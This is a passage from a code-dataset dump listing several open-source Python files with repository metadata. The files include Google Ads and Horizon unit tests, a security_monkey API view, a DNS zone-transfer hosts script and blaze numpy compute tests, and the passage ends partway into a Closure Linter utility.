repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
lociii/googleads-python-lib | tests/adspygoogle/dfa/v1_18/change_log_service_unittest.py | 3 | 4199 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests to cover ChangeLogService."""
__author__ = 'api.jdilallo@gmail.com (Joseph DiLallo)'
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
import unittest
from tests.adspygoogle.dfa.v1_18 import client
from tests.adspygoogle.dfa.v1_18 import HTTP_PROXY
from tests.adspygoogle.dfa.v1_18 import SERVER_V1_18
from tests.adspygoogle.dfa.v1_18 import VERSION_V1_18
class ChangeLogServiceTestV1_18(unittest.TestCase):
"""Unittest suite for ChangeLogService using v1_18."""
SERVER = SERVER_V1_18
VERSION = VERSION_V1_18
client.debug = False
service = None
advertiser_id = '0'
change_log_record_id = '0'
def setUp(self):
"""Prepare unittest."""
print self.id()
if not self.__class__.service:
self.__class__.service = client.GetChangeLogService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
advertiser_service = client.GetAdvertiserService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
search_criteria = {}
self.__class__.advertiser_id = advertiser_service.GetAdvertisers(
search_criteria)[0]['records'][0]['id']
def testGetChangeLogObjectTypes(self):
"""Test whether we can fetch object types that support change logs."""
self.assert_(isinstance(self.__class__.service.GetChangeLogObjectTypes(),
tuple))
def testGetChangeLogRecord(self):
"""Test whether we can fetch a change log record."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
self.assert_(isinstance(self.__class__.service.GetChangeLogRecord(
change_log_record_id), tuple))
def testGetChangeLogRecordForObjectType(self):
"""Test whether we can fetch change log record for given id and object type.
"""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
object_type_id = '1'
self.assert_(isinstance(
self.__class__.service.GetChangeLogRecordForObjectType(
change_log_record_id, object_type_id), tuple))
def testGetChangeLogRecords(self):
"""Test whether we can fetch change log records."""
criteria = {
'objectId': self.__class__.advertiser_id
}
records = self.__class__.service.GetChangeLogRecords(criteria)
self.__class__.change_log_record_id = records[0]['records'][0]['id']
self.assert_(isinstance(records, tuple))
def testUpdateChangeLogRecordComments(self):
"""Test whether we can update change log record comments."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
comments = 'This is a cool change!'
self.assertEqual(self.__class__.service.UpdateChangeLogRecordComments(
change_log_record_id, comments), None)
def testUpdateChangeLogRecordCommentsForObjectType(self):
"""Test whether we can update change log record comments for object type."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
comments = 'This is a very cool change!'
object_type_id = '1'
self.assertEqual(
self.__class__.service.UpdateChangeLogRecordCommentsForObjectType(
change_log_record_id, comments, object_type_id), None)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
timevortexproject/timevortex | features/steps/test_globals.py | 1 | 2400 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Functionnal test toolkit"""
import shutil
from os.path import exists
from django.conf import settings
from timevortex.utils.filestorage import SETTINGS_FILE_STORAGE_FOLDER, SETTINGS_DEFAULT_FILE_STORAGE_FOLDER
from weather.utils.globals import SETTINGS_STUBS_METEAR_URL, SETTINGS_METEAR_URL
from weather.utils.globals import SETTINGS_STUBS_METEAR_START_DATE
from weather.models import set_metear_start_date
SOCAT = "socat"
TIMEVORTEX_LOG_FILE = "/tmp/timevortex/timevortex.log"
DICT_JSON_REQUEST_HEADER = {'Content-type': 'application/json', 'Accept': '*/*'}
STUBS_COMMAND = "python manage.py runserver 0.0.0.0:8000"
KEY_LABEL = "label"
KEY_SITE_TYPE = "site_type"
WITH_STUBS = "with_stubs"
def reset_testing_environment():
data_folder = getattr(settings, SETTINGS_FILE_STORAGE_FOLDER, SETTINGS_DEFAULT_FILE_STORAGE_FOLDER)
if exists(data_folder):
shutil.rmtree(data_folder)
setattr(settings, SETTINGS_METEAR_URL, SETTINGS_STUBS_METEAR_URL)
set_metear_start_date(SETTINGS_STUBS_METEAR_START_DATE)
def assert_equal(element1, element2):
try:
assert element1 in element2, "%s should equal to %s" % (element1, element2)
except TypeError:
assert element1 == element2, "%s should equal to %s" % (element1, element2)
def assert_gte(element1, element2):
assert element1 >= element2, "%s should be gte to %s" % (element1, element2)
def assert_lte(element1, element2):
assert element1 <= element2, "%s should be lte to %s" % (element1, element2)
def read_log(log_file_path, line):
log_file = open(log_file_path, "r")
lines = log_file.readlines()
log_file.close()
body = lines[line]
# log_message = "1. => %s" % body
# LOGGER.debug(log_message)
body = " ".join(body.split(" ")[9:])[:-1]
# log_message = "2. => %s" % body
# LOGGER.debug(log_message)
return body
def counter_from_log(word, expected_occurency, log_file_path, line):
from collections import Counter
body = read_log(log_file_path, line)
c = Counter()
for line in body.splitlines():
c.update(line.split())
if expected_occurency == 0:
assert word not in c, "%s should not be in %s" % (word, c)
else:
assert word in c, "%s should be in %s" % (word, c)
assert_equal(c[word], expected_occurency)
| mit |
ric2b/Vivaldi-browser | chromium/third_party/webxr_test_pages/make_ot_samples_folder.py | 10 | 1244 | #!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import shutil
import sys
samples_pages = [
'xr-barebones.html',
'magic-window.html',
'teleportation.html',
'gamepad.html'
]
other_pages = [
'attribution.html',
'favicon-32x32.png',
'favicon-96x96.png',
'favicon.ico',
'LICENSE.md'
]
copy_folders = [
'css',
'js'
]
def make_ot_samples_folder(source, dest):
os.mkdir(dest)
for f in samples_pages:
shutil.copy(os.path.join(source, f), dest)
for f in other_pages:
shutil.copy(os.path.join(source, f), dest)
for f in copy_folders:
shutil.copytree(os.path.join(source, f), os.path.join(dest, f))
shutil.copy(
os.path.join(source, 'index.published.html'),
os.path.join(dest, 'index.html'))
shutil.make_archive('source', 'zip', dest)
shutil.move('source.zip', dest)
# media folder won't be included in the zip file or uploaded in any way as
# part of this process
shutil.copytree(os.path.join(source, 'media'), os.path.join(dest, 'media'))
def main():
make_ot_samples_folder(sys.argv[1], sys.argv[2])
if __name__ == '__main__':
main()
| bsd-3-clause |
r-icarus/openstack_microserver | horizon/test/tests/messages.py | 10 | 2373 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django import http
from django.utils.encoding import force_unicode # noqa
from django.utils.safestring import mark_safe # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import messages
from horizon import middleware
from horizon.test import helpers as test
class MessageTests(test.TestCase):
def test_middleware_header(self):
req = self.request
string = "Giant ants are attacking San Francisco!"
expected = ["error", force_unicode(string), ""]
self.assertTrue("async_messages" in req.horizon)
self.assertItemsEqual(req.horizon['async_messages'], [])
req.META['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest'
messages.error(req, string)
self.assertItemsEqual(req.horizon['async_messages'], [expected])
res = http.HttpResponse()
res = middleware.HorizonMiddleware().process_response(req, res)
self.assertEqual(res['X-Horizon-Messages'],
json.dumps([expected]))
def test_safe_message(self):
req = self.request
string = mark_safe("We are now safe from ants! Go <a>here</a>!")
expected = ["error", force_unicode(string), " safe"]
self.assertTrue("async_messages" in req.horizon)
self.assertItemsEqual(req.horizon['async_messages'], [])
req.META['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest'
messages.error(req, string)
self.assertItemsEqual(req.horizon['async_messages'], [expected])
res = http.HttpResponse()
res = middleware.HorizonMiddleware().process_response(req, res)
self.assertEqual(res['X-Horizon-Messages'],
json.dumps([expected]))
| apache-2.0 |
bunjiboys/security_monkey | security_monkey/views/distinct.py | 1 | 6408 | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from security_monkey.views import AuthenticatedService
from security_monkey.datastore import Item
from security_monkey.datastore import Account
from security_monkey.datastore import Technology
from security_monkey.datastore import ItemRevision
from security_monkey import rbac
from flask_restful import reqparse
from sqlalchemy.sql.expression import func
import json
class Distinct(AuthenticatedService):
decorators = [
rbac.allow(["View"], ["GET"])
]
def __init__(self):
self.reqparse = reqparse.RequestParser()
super(Distinct, self).__init__()
def get(self, key_id):
"""
.. http:get:: /api/1/distinct
Get a list of distinct regions, names, accounts, or technologies
**Example Request**:
.. sourcecode:: http
GET /api/1/distinct/name HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
:statuscode 200: no error
"""
self.reqparse.add_argument('count', type=int, default=30, location='args')
self.reqparse.add_argument('page', type=int, default=1, location='args')
self.reqparse.add_argument('select2', type=str, default="", location='args')
self.reqparse.add_argument('searchconfig', type=str, default="", location='args')
self.reqparse.add_argument('regions', type=str, default=None, location='args')
self.reqparse.add_argument('accounts', type=str, default=None, location='args')
self.reqparse.add_argument('technologies', type=str, default=None, location='args')
self.reqparse.add_argument('names', type=str, default=None, location='args')
self.reqparse.add_argument('active', type=str, default=None, location='args')
args = self.reqparse.parse_args()
page = args.pop('page', None)
count = args.pop('count', None)
q = args.pop('searchconfig', "").lower()
select2 = args.pop('select2', "")
for k, v in args.items():
if not v:
del args[k]
if select2.lower() == 'true':
select2 = True
else:
select2 = False
query = Item.query
query = query.join((Account, Account.id == Item.account_id))
query = query.join((Technology, Technology.id == Item.tech_id))
query = query.join((ItemRevision, Item.latest_revision_id == ItemRevision.id))
if 'regions' in args and key_id != 'region':
regions = args['regions'].split(',')
query = query.filter(Item.region.in_(regions))
if 'accounts' in args and key_id != 'account':
accounts = args['accounts'].split(',')
query = query.filter(Account.name.in_(accounts))
if 'technologies' in args and key_id != 'tech':
technologies = args['technologies'].split(',')
query = query.filter(Technology.name.in_(technologies))
if 'names' in args and key_id != 'name':
names = args['names'].split(',')
query = query.filter(Item.name.in_(names))
if 'arns' in args and key_id != 'arn':
names = args['arns'].split(',')
query = query.filter(Item.arn.in_(names))
if 'active' in args:
active = args['active'].lower() == "true"
query = query.filter(ItemRevision.active == active)
if key_id == 'tech':
if select2:
query = query.distinct(Technology.name).filter(func.lower(Technology.name).like('%' + q + '%'))
else:
query = query.distinct(Technology.name)
elif key_id == 'account':
if select2:
query = query.filter(Account.third_party == False)
query = query.distinct(Account.name).filter(func.lower(Account.name).like('%' + q + '%'))
else:
query = query.distinct(Account.name)
else:
filter_by = None
if key_id == "region":
filter_by = Item.region
elif key_id == "name":
filter_by = Item.name
elif key_id == "arn":
filter_by = Item.arn
else:
return json.loads('{ "error": "Supply key in type,region,account,name,arn" }')
if select2:
query = query.distinct(filter_by).filter(func.lower(filter_by).like('%' + q + '%'))
else:
query = query.distinct(filter_by)
items = query.paginate(page, count, error_out=False)
marshaled_dict = {}
list_distinct = []
for item in items.items:
if key_id == "tech":
text = item.technology.name
item_id = item.id
elif key_id == "account":
text = item.account.name
item_id = item.id
elif key_id == "region":
text = item.region
item_id = item.id
elif key_id == "name":
text = item.name
item_id = item.id
elif key_id == "arn":
text = item.arn
item_id = item.id
if(select2):
list_distinct.append({"id": item_id, "text": text})
else:
list_distinct.append(text)
marshaled_dict['auth'] = self.auth_dict
marshaled_dict['items'] = list_distinct
marshaled_dict['page'] = items.page
marshaled_dict['total'] = items.total
marshaled_dict['key_id'] = key_id
return marshaled_dict, 200
| apache-2.0 |
jiasir/get-dns | get-dns.py | 1 | 1999 | #!/usr/bin/env python
__author__ = 'Taio'
import os
import os.path
import dns.query
import dns.zone
import logging
from utils.noflib import Noflib
run = Noflib()
logger = logging.getLogger('get-dns')
logging.basicConfig(filename='/var/log/get-dns/get-dns.log', level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
dcAdd = '172.20.10.75'
domainName = 'spidc1.com'
z = dns.zone.from_xfr(dns.query.xfr(dcAdd, domainName))
names = z.nodes.keys()
names.sort()
def get_client_hosts():
with open('client_hosts', 'r') as f:
return f.read()
def print_local_host():
print '127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4'
print '::1 localhost localhost.localdomain localhost6 localhost6.localdomain6'
def print_records_stdout():
"""Print records only to stdout"""
for i in names:
line = z[i].to_text(i).split()
logger.info(line[3])
if line[3] == 'A':
logger.info(line[4])
new_line = line[4] + ' ' + line[0] + '.spidc1.com'
if new_line not in get_except_hosts():
logger.info(new_line)
print new_line
def gen_records_spidc1():
"""Write to /etc/hosts file"""
try:
with open('/etc/hosts', 'a') as f:
for i in names:
f.write(z[i].to_text(i))
except IOError:
logger.error(IOError.__doc__)
print IOError.__doc__
def get_except_hosts():
"""
Get Linux hosts file.
:return string:
"""
with open('except_hosts', 'r') as h:
return h.read()
def main():
if not os.path.exists('/var/log/get-dns'):
run.execute_get_output('sudo', 'mkdir', '/var/log/get-dns')
print_local_host()
print_records_stdout()
print get_client_hosts()
if __name__ == '__main__':
if os.getuid() == 0:
main()
else:
print 'You do not have permission, please run as root.'
exit() | mit |
maxalbert/blaze | blaze/compute/tests/test_numpy_compute.py | 3 | 16537 | from __future__ import absolute_import, division, print_function
import pytest
import numpy as np
import pandas as pd
from datetime import datetime, date
from blaze.compute.core import compute, compute_up
from blaze.expr import symbol, by, exp, summary, Broadcast, join, concat
from blaze import sin
from odo import into
from datashape import discover, to_numpy, dshape
x = np.array([(1, 'Alice', 100),
(2, 'Bob', -200),
(3, 'Charlie', 300),
(4, 'Denis', 400),
(5, 'Edith', -500)],
dtype=[('id', 'i8'), ('name', 'S7'), ('amount', 'i8')])
t = symbol('t', discover(x))
def eq(a, b):
c = a == b
if isinstance(c, np.ndarray):
return c.all()
return c
def test_symbol():
assert eq(compute(t, x), x)
def test_eq():
assert eq(compute(t['amount'] == 100, x),
x['amount'] == 100)
def test_selection():
assert eq(compute(t[t['amount'] == 100], x), x[x['amount'] == 0])
assert eq(compute(t[t['amount'] < 0], x), x[x['amount'] < 0])
def test_arithmetic():
assert eq(compute(t['amount'] + t['id'], x),
x['amount'] + x['id'])
assert eq(compute(t['amount'] * t['id'], x),
x['amount'] * x['id'])
assert eq(compute(t['amount'] % t['id'], x),
x['amount'] % x['id'])
def test_UnaryOp():
assert eq(compute(exp(t['amount']), x),
np.exp(x['amount']))
assert eq(compute(abs(-t['amount']), x),
abs(-x['amount']))
def test_Neg():
assert eq(compute(-t['amount'], x),
-x['amount'])
def test_invert_not():
assert eq(compute(~(t.amount > 0), x),
~(x['amount'] > 0))
def test_Reductions():
assert compute(t['amount'].mean(), x) == x['amount'].mean()
assert compute(t['amount'].count(), x) == len(x['amount'])
assert compute(t['amount'].sum(), x) == x['amount'].sum()
assert compute(t['amount'].min(), x) == x['amount'].min()
assert compute(t['amount'].max(), x) == x['amount'].max()
assert compute(t['amount'].nunique(), x) == len(np.unique(x['amount']))
assert compute(t['amount'].var(), x) == x['amount'].var()
assert compute(t['amount'].std(), x) == x['amount'].std()
assert compute(t['amount'].var(unbiased=True), x) == x['amount'].var(ddof=1)
assert compute(t['amount'].std(unbiased=True), x) == x['amount'].std(ddof=1)
assert compute((t['amount'] > 150).any(), x) == True
assert compute((t['amount'] > 250).all(), x) == False
assert compute(t['amount'][0], x) == x['amount'][0]
assert compute(t['amount'][-1], x) == x['amount'][-1]
def test_count_string():
s = symbol('name', 'var * ?string')
x = np.array(['Alice', np.nan, 'Bob', 'Denis', 'Edith'], dtype='object')
assert compute(s.count(), x) == 4
def test_reductions_on_recarray():
assert compute(t.count(), x) == len(x)
def test_count_nan():
t = symbol('t', '3 * ?real')
x = np.array([1.0, np.nan, 2.0])
assert compute(t.count(), x) == 2
def test_distinct():
x = np.array([('Alice', 100),
('Alice', -200),
('Bob', 100),
('Bob', 100)],
dtype=[('name', 'S5'), ('amount', 'i8')])
t = symbol('t', 'var * {name: string, amount: int64}')
assert eq(compute(t['name'].distinct(), x),
np.unique(x['name']))
assert eq(compute(t.distinct(), x),
np.unique(x))
def test_distinct_on_recarray():
rec = pd.DataFrame(
[[0, 1],
[0, 2],
[1, 1],
[1, 2]],
columns=('a', 'b'),
).to_records(index=False)
s = symbol('s', discover(rec))
assert (
compute(s.distinct('a'), rec) ==
pd.DataFrame(
[[0, 1],
[1, 1]],
columns=('a', 'b'),
).to_records(index=False)
).all()
def test_distinct_on_structured_array():
arr = np.array(
[(0., 1.),
(0., 2.),
(1., 1.),
(1., 2.)],
dtype=[('a', 'f4'), ('b', 'f4')],
)
s = symbol('s', discover(arr))
assert(
compute(s.distinct('a'), arr) ==
np.array([(0., 1.), (1., 1.)], dtype=arr.dtype)
).all()
def test_distinct_on_str():
rec = pd.DataFrame(
[['a', 'a'],
['a', 'b'],
['b', 'a'],
['b', 'b']],
columns=('a', 'b'),
).to_records(index=False).astype([('a', '<U1'), ('b', '<U1')])
s = symbol('s', discover(rec))
assert (
compute(s.distinct('a'), rec) ==
pd.DataFrame(
[['a', 'a'],
['b', 'a']],
columns=('a', 'b'),
).to_records(index=False).astype([('a', '<U1'), ('b', '<U1')])
).all()
def test_sort():
assert eq(compute(t.sort('amount'), x),
np.sort(x, order='amount'))
assert eq(compute(t.sort('amount', ascending=False), x),
np.sort(x, order='amount')[::-1])
assert eq(compute(t.sort(['amount', 'id']), x),
np.sort(x, order=['amount', 'id']))
assert eq(compute(t.amount.sort(), x),
np.sort(x['amount']))
def test_head():
assert eq(compute(t.head(2), x),
x[:2])
def test_tail():
assert eq(compute(t.tail(2), x),
x[-2:])
def test_label():
expected = x['amount'] * 10
expected = np.array(expected, dtype=[('foo', 'i8')])
assert eq(compute((t['amount'] * 10).label('foo'), x),
expected)
def test_relabel():
expected = np.array(x, dtype=[('ID', 'i8'), ('NAME', 'S7'), ('amount', 'i8')])
result = compute(t.relabel({'name': 'NAME', 'id': 'ID'}), x)
assert result.dtype.names == expected.dtype.names
assert eq(result, expected)
def test_by():
expr = by(t.amount > 0, count=t.id.count())
result = compute(expr, x)
assert set(map(tuple, into(list, result))) == set([(False, 2), (True, 3)])
def test_compute_up_field():
assert eq(compute(t['name'], x), x['name'])
def test_compute_up_projection():
assert eq(compute_up(t[['name', 'amount']], x), x[['name', 'amount']])
ax = np.arange(30, dtype='f4').reshape((5, 3, 2))
a = symbol('a', discover(ax))
def test_slice():
inds = [0, slice(2), slice(1, 3), slice(None, None, 2), [1, 2, 3],
(0, 1), (0, slice(1, 3)), (slice(0, 3), slice(3, 1, -1)),
(0, [1, 2])]
for s in inds:
assert (compute(a[s], ax) == ax[s]).all()
def test_array_reductions():
for axis in [None, 0, 1, (0, 1), (2, 1)]:
assert eq(compute(a.sum(axis=axis), ax), ax.sum(axis=axis))
assert eq(compute(a.std(axis=axis), ax), ax.std(axis=axis))
def test_array_reductions_with_keepdims():
for axis in [None, 0, 1, (0, 1), (2, 1)]:
assert eq(compute(a.sum(axis=axis, keepdims=True), ax),
ax.sum(axis=axis, keepdims=True))
def test_summary_on_ndarray():
assert compute(summary(total=a.sum(), min=a.min()), ax) == \
(ax.min(), ax.sum())
result = compute(summary(total=a.sum(), min=a.min(), keepdims=True), ax)
expected = np.array([(ax.min(), ax.sum())],
dtype=[('min', 'float32'), ('total', 'float64')])
assert result.ndim == ax.ndim
assert eq(expected, result)
def test_summary_on_ndarray_with_axis():
for axis in [0, 1, (1, 0)]:
expr = summary(total=a.sum(), min=a.min(), axis=axis)
result = compute(expr, ax)
shape, dtype = to_numpy(expr.dshape)
expected = np.empty(shape=shape, dtype=dtype)
expected['total'] = ax.sum(axis=axis)
expected['min'] = ax.min(axis=axis)
assert eq(result, expected)
def test_utcfromtimestamp():
t = symbol('t', '1 * int64')
data = np.array([0, 1])
expected = np.array(['1970-01-01T00:00:00Z', '1970-01-01T00:00:01Z'],
dtype='M8[us]')
assert eq(compute(t.utcfromtimestamp, data), expected)
def test_nelements_structured_array():
assert compute(t.nelements(), x) == len(x)
assert compute(t.nelements(keepdims=True), x) == (len(x),)
def test_nelements_array():
t = symbol('t', '5 * 4 * 3 * float64')
x = np.random.randn(*t.shape)
result = compute(t.nelements(axis=(0, 1)), x)
np.testing.assert_array_equal(result, np.array([20, 20, 20]))
result = compute(t.nelements(axis=1), x)
np.testing.assert_array_equal(result, 4 * np.ones((5, 3)))
def test_nrows():
assert compute(t.nrows, x) == len(x)
dts = np.array(['2000-06-25T12:30:04Z', '2000-06-28T12:50:05Z'],
dtype='M8[us]')
s = symbol('s', 'var * datetime')
def test_datetime_truncation():
assert eq(compute(s.truncate(1, 'day'), dts),
dts.astype('M8[D]'))
assert eq(compute(s.truncate(2, 'seconds'), dts),
np.array(['2000-06-25T12:30:04Z', '2000-06-28T12:50:04Z'],
dtype='M8[s]'))
assert eq(compute(s.truncate(2, 'weeks'), dts),
np.array(['2000-06-18', '2000-06-18'], dtype='M8[D]'))
assert into(list, compute(s.truncate(1, 'week'), dts))[0].isoweekday() == 7
def test_hour():
dts = [datetime(2000, 6, 20, 1, 00, 00),
datetime(2000, 6, 20, 12, 59, 59),
datetime(2000, 6, 20, 12, 00, 00),
datetime(2000, 6, 20, 11, 59, 59)]
dts = into(np.ndarray, dts)
assert eq(compute(s.truncate(1, 'hour'), dts),
into(np.ndarray, [datetime(2000, 6, 20, 1, 0),
datetime(2000, 6, 20, 12, 0),
datetime(2000, 6, 20, 12, 0),
datetime(2000, 6, 20, 11, 0)]))
def test_month():
dts = [datetime(2000, 7, 1),
datetime(2000, 6, 30),
datetime(2000, 6, 1),
datetime(2000, 5, 31)]
dts = into(np.ndarray, dts)
assert eq(compute(s.truncate(1, 'month'), dts),
into(np.ndarray, [date(2000, 7, 1),
date(2000, 6, 1),
date(2000, 6, 1),
date(2000, 5, 1)]))
def test_truncate_on_np_datetime64_scalar():
s = symbol('s', 'datetime')
data = np.datetime64('2000-01-02T12:30:00Z')
assert compute(s.truncate(1, 'day'), data) == data.astype('M8[D]')
def test_numpy_and_python_datetime_truncate_agree_on_start_of_week():
s = symbol('s', 'datetime')
n = np.datetime64('2014-11-11')
p = datetime(2014, 11, 11)
expr = s.truncate(1, 'week')
assert compute(expr, n) == compute(expr, p)
def test_add_multiple_ndarrays():
a = symbol('a', '5 * 4 * int64')
b = symbol('b', '5 * 4 * float32')
x = np.arange(9, dtype='int64').reshape(3, 3)
y = (x + 1).astype('float32')
expr = sin(a) + 2 * b
scope = {a: x, b: y}
expected = sin(x) + 2 * y
# check that we cast correctly
assert expr.dshape == dshape('5 * 4 * float64')
np.testing.assert_array_equal(compute(expr, scope), expected)
np.testing.assert_array_equal(compute(expr, scope, optimize=False),
expected)
nA = np.arange(30, dtype='f4').reshape((5, 6))
ny = np.arange(6, dtype='f4')
A = symbol('A', discover(nA))
y = symbol('y', discover(ny))
def test_transpose():
assert eq(compute(A.T, nA), nA.T)
assert eq(compute(A.transpose((0, 1)), nA), nA)
def test_dot():
assert eq(compute(y.dot(y), {y: ny}), np.dot(ny, ny))
assert eq(compute(A.dot(y), {A: nA, y: ny}), np.dot(nA, ny))
def test_subexpr_datetime():
data = pd.date_range(start='01/01/2010', end='01/04/2010', freq='D').values
s = symbol('s', discover(data))
result = compute(s.truncate(days=2).day, data)
expected = np.array([31, 2, 2, 4])
np.testing.assert_array_equal(result, expected)
def test_mixed_types():
x = np.array([[(4, 180), (4, 184), (4, 188), (4, 192), (4, 196)],
[(4, 660), (4, 664), (4, 668), (4, 672), (4, 676)],
[(4, 1140), (4, 1144), (4, 1148), (4, 1152), (4, 1156)],
[(4, 1620), (4, 1624), (4, 1628), (4, 1632), (4, 1636)],
[(4, 2100), (4, 2104), (4, 2108), (4, 2112), (4, 2116)]],
dtype=[('count', '<i4'), ('total', '<i8')])
aggregate = symbol('aggregate', discover(x))
result = compute(aggregate.total.sum(axis=(0,)) /
aggregate.count.sum(axis=(0,)), x)
expected = (x['total'].sum(axis=0, keepdims=True) /
x['count'].sum(axis=0, keepdims=True)).squeeze()
np.testing.assert_array_equal(result, expected)
def test_broadcast_compute_against_numbers_and_arrays():
A = symbol('A', '5 * float32')
a = symbol('a', 'float32')
b = symbol('b', 'float32')
x = np.arange(5, dtype='f4')
expr = Broadcast((A, b), (a, b), a + b)
result = compute(expr, {A: x, b: 10})
assert eq(result, x + 10)
def test_map():
pytest.importorskip('numba')
a = np.arange(10.0)
f = lambda x: np.sin(x) + 1.03 * np.cos(x) ** 2
x = symbol('x', discover(a))
expr = x.map(f, 'float64')
result = compute(expr, a)
expected = f(a)
# make sure we're not going to pandas here
assert type(result) == np.ndarray
assert type(result) == type(expected)
np.testing.assert_array_equal(result, expected)
def test_vector_norm():
x = np.arange(30).reshape((5, 6))
s = symbol('x', discover(x))
assert eq(compute(s.vnorm(), x),
np.linalg.norm(x))
assert eq(compute(s.vnorm(ord=1), x),
np.linalg.norm(x.flatten(), ord=1))
assert eq(compute(s.vnorm(ord=4, axis=0), x),
np.linalg.norm(x, ord=4, axis=0))
expr = s.vnorm(ord=4, axis=0, keepdims=True)
assert expr.shape == compute(expr, x).shape
def test_join():
cities = np.array([('Alice', 'NYC'),
('Alice', 'LA'),
('Bob', 'Chicago')],
dtype=[('name', 'S7'), ('city', 'O')])
c = symbol('cities', discover(cities))
expr = join(t, c, 'name')
result = compute(expr, {t: x, c: cities})
assert (b'Alice', 1, 100, 'LA') in into(list, result)
def test_query_with_strings():
b = np.array([('a', 1), ('b', 2), ('c', 3)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
assert compute(s[s.x == b'b'], b).tolist() == [(b'b', 2)]
@pytest.mark.parametrize('keys', [['a'], list('bc')])
def test_isin(keys):
b = np.array([('a', 1), ('b', 2), ('c', 3), ('a', 4), ('c', 5), ('b', 6)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
result = compute(s.x.isin(keys), b)
expected = np.in1d(b['x'], keys)
np.testing.assert_array_equal(result, expected)
def test_nunique_recarray():
b = np.array([('a', 1), ('b', 2), ('c', 3), ('a', 4), ('c', 5), ('b', 6),
('a', 1), ('b', 2)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
expr = s.nunique()
assert compute(expr, b) == len(np.unique(b))
def test_str_repeat():
a = np.array(('a', 'b', 'c'))
s = symbol('s', discover(a))
expr = s.repeat(3)
assert all(compute(expr, a) == np.char.multiply(a, 3))
def test_str_interp():
a = np.array(('%s', '%s', '%s'))
s = symbol('s', discover(a))
expr = s.interp(1)
assert all(compute(expr, a) == np.char.mod(a, 1))
def test_timedelta_arith():
dates = np.arange('2014-01-01', '2014-02-01', dtype='datetime64')
delta = np.timedelta64(1, 'D')
sym = symbol('s', discover(dates))
assert (compute(sym + delta, dates) == dates + delta).all()
assert (compute(sym - delta, dates) == dates - delta).all()
def test_coerce():
x = np.arange(1, 3)
s = symbol('s', discover(x))
np.testing.assert_array_equal(compute(s.coerce('float64'), x),
np.arange(1.0, 3.0))
def test_concat_arr():
s_data = np.arange(15)
t_data = np.arange(15, 30)
s = symbol('s', discover(s_data))
t = symbol('t', discover(t_data))
assert (
compute(concat(s, t), {s: s_data, t: t_data}) ==
np.arange(30)
).all()
def test_concat_mat():
s_data = np.arange(15).reshape(5, 3)
t_data = np.arange(15, 30).reshape(5, 3)
s = symbol('s', discover(s_data))
t = symbol('t', discover(t_data))
assert (
compute(concat(s, t), {s: s_data, t: t_data}) ==
np.arange(30).reshape(10, 3)
).all()
assert (
compute(concat(s, t, axis=1), {s: s_data, t: t_data}) ==
np.concatenate((s_data, t_data), axis=1)
).all()
| bsd-3-clause |
Epirex/android_external_chromium_org | third_party/closure_linter/closure_linter/common/erroroutput.py | 266 | 1549 | #!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions to format errors."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)',
'nnaze@google.com (Nathan Naze)')
def GetUnixErrorOutput(filename, error, new_error=False):
